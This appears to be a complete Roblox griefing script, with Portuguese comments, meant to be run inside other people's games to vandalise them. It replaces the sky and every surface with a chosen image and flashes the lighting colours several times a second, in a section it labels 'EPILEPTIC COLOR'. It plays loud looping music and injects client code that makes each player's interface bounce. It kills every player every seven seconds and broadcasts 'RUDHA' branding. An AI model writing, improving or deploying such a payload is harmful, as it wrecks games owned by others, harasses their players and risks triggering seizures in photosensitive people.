--RUDHA GAME FUCKER V2






-------------------------


-- CONFIGURAÇÃO
-------------------------

local CONFIG = {
	ASSET_ID = "96931292236031", -- <<< MUDA AQUI
	MUSIC_ID = "125324801699414", -- <<< MUDA AQUI
	DISCO_SPEED = 0.2,
	COLOR_SPEED = 0.1,
	GUI_SPEED_MIN = 100,
	GUI_SPEED_MAX = 300,
	BASEPLATE_TILT = 20
}

-------------------------
-- SERVICES
-------------------------

local Players = game:GetService("Players")
local Lighting = game:GetService("Lighting")
local StarterGui = game:GetService("StarterGui")
local SoundService = game:GetService("SoundService")
local RunService = game:GetService("RunService")

local ASSET = "rbxassetid://" .. CONFIG.ASSET_ID
local MUSIC = "rbxassetid://" .. CONFIG.MUSIC_ID

-------------------------
-- SKY
-------------------------

local sky = Instance.new("Sky", Lighting)
sky.SkyboxBk = ASSET
sky.SkyboxDn = ASSET
sky.SkyboxFt = ASSET
sky.SkyboxLf = ASSET
sky.SkyboxRt = ASSET
sky.SkyboxUp = ASSET

-------------------------
-- DISCO FOG
-------------------------

Lighting.FogStart = 0
Lighting.FogEnd = 100

task.spawn(function()
	while true do
		Lighting.Brightness = math.random(0, 10)
		Lighting.Ambient = Color3.fromRGB(math.random(255), math.random(255), math.random(255))
		Lighting.FogColor = Color3.fromRGB(math.random(255), math.random(255), math.random(255))
		task.wait(CONFIG.DISCO_SPEED)
	end
end)

-------------------------
-- EPILEPTIC COLOR
-------------------------

task.spawn(function()
	while true do
		Lighting.Ambient = Color3.fromRGB(math.random(255), math.random(255), math.random(255))
		Lighting.OutdoorAmbient = Color3.fromRGB(math.random(255), math.random(255), math.random(255))
		Lighting.ColorShift_Top = Color3.fromRGB(math.random(255), math.random(255), math.random(255))
		Lighting.ColorShift_Bottom = Color3.fromRGB(math.random(255), math.random(255), math.random(255))
		task.wait(CONFIG.COLOR_SPEED)
	end
end)

-------------------------
-- BASEPLATE /
-------------------------

local baseplate = workspace:FindFirstChild("Baseplate")

if baseplate and baseplate:IsA("BasePart") then
	baseplate.CFrame *= CFrame.Angles(0, 0, math.rad(CONFIG.BASEPLATE_TILT))
end

-------------------------
-- DECAL SPAM
-------------------------

local function isPlayerCharacter(part)
	local model = part:FindFirstAncestorOfClass("Model")
	if model and model:FindFirstChildOfClass("Humanoid") then
		return true
	end
	return false
end

for _, obj in pairs(workspace:GetDescendants()) do
	if obj:IsA("BasePart")
		and not obj:FindFirstChild("CHAOS_DECAL")
		and not isPlayerCharacter(obj) then

		for _, face in pairs(Enum.NormalId:GetEnumItems()) do
			local decal = Instance.new("Decal")
			decal.Name = "CHAOS_DECAL"
			decal.Texture = ASSET
			decal.Face = face
			decal.Parent = obj
		end
	end
end

-------------------------
-- PARTÍCULAS NOS PLAYERS
-------------------------

local function addParticles(character)
	local root = character:WaitForChild("HumanoidRootPart", 5)
	if root then
		local att = Instance.new("Attachment", root)
		local particle = Instance.new("ParticleEmitter", att)
		particle.Texture = ASSET
		particle.Rate = 25
		particle.Lifetime = NumberRange.new(2)
		particle.Speed = NumberRange.new(1, 2)
		particle.Size = NumberSequence.new(2)
		particle.SpreadAngle = Vector2.new(360, 360)
	end
end

Players.PlayerAdded:Connect(function(player)
	player.CharacterAdded:Connect(addParticles)
end)

-------------------------
-- MESSAGE
-------------------------

local message = Instance.new("Message", workspace)
message.Text = "THE TEAPOTS HAVE TAKEN OVER."
task.wait(5)

message.Text = "RUDHA IS SINGLE, NOT A TEAM."
task.wait(5)

message:Destroy()

-------------------------
-- MÚSICA
-------------------------

local music = Instance.new("Sound", SoundService)
music.SoundId = MUSIC
music.Looped = true
music.Volume = 5
music.Pitch = 0.8
music:Play()

Players.PlayerAdded:Connect(function(player)
	player.CharacterAdded:Wait()

	local localScript = Instance.new("LocalScript")

	localScript.Source = [[
		local RunService = game:GetService("RunService")
		local player = game.Players.LocalPlayer

		local function infect(guiObject)
			if not guiObject:IsA("GuiObject") then return end

			guiObject.Active = true
			guiObject.AnchorPoint = Vector2.new(0, 0)

			local speed = Vector2.new(
				math.random(]] .. CONFIG.GUI_SPEED_MIN .. [[, ]] .. CONFIG.GUI_SPEED_MAX .. [[),
				math.random(]] .. CONFIG.GUI_SPEED_MIN .. [[, ]] .. CONFIG.GUI_SPEED_MAX .. [[)
			)

			RunService.RenderStepped:Connect(function(dt)
				if not guiObject.Parent then return end

				local parentSize = guiObject.Parent.AbsoluteSize
				local size = guiObject.AbsoluteSize
				local pos = guiObject.AbsolutePosition

				if pos.X <= 0 or pos.X + size.X >= parentSize.X then
					speed = Vector2.new(-speed.X, speed.Y)
				end

				if pos.Y <= 0 or pos.Y + size.Y >= parentSize.Y then
					speed = Vector2.new(speed.X, -speed.Y)
				end

				guiObject.Position = UDim2.fromOffset(
					guiObject.Position.X.Offset + speed.X * dt,
					guiObject.Position.Y.Offset + speed.Y * dt
				)
			end)
		end

		for _, gui in pairs(player.PlayerGui:GetDescendants()) do
			infect(gui)
		end

		player.PlayerGui.DescendantAdded:Connect(infect)
	]]

	localScript.Parent = player:WaitForChild("PlayerGui")
end)

task.spawn(function()
	local hint = Instance.new("Hint", workspace)
	hint.Text = "RUDHA IS SINGLE, NOT A TEAM."
end)

-------------------------
-- MORTE GLOBAL A CADA 7 SEGUNDOS
-------------------------

task.spawn(function()
	while true do
		task.wait(7)

		for _, player in ipairs(Players:GetPlayers()) do
			if player.Character then
				local humanoid = player.Character:FindFirstChildOfClass("Humanoid")
				if humanoid and humanoid.Health > 0 then
					humanoid.Health = 0
				end
			end
		end
	end
end)
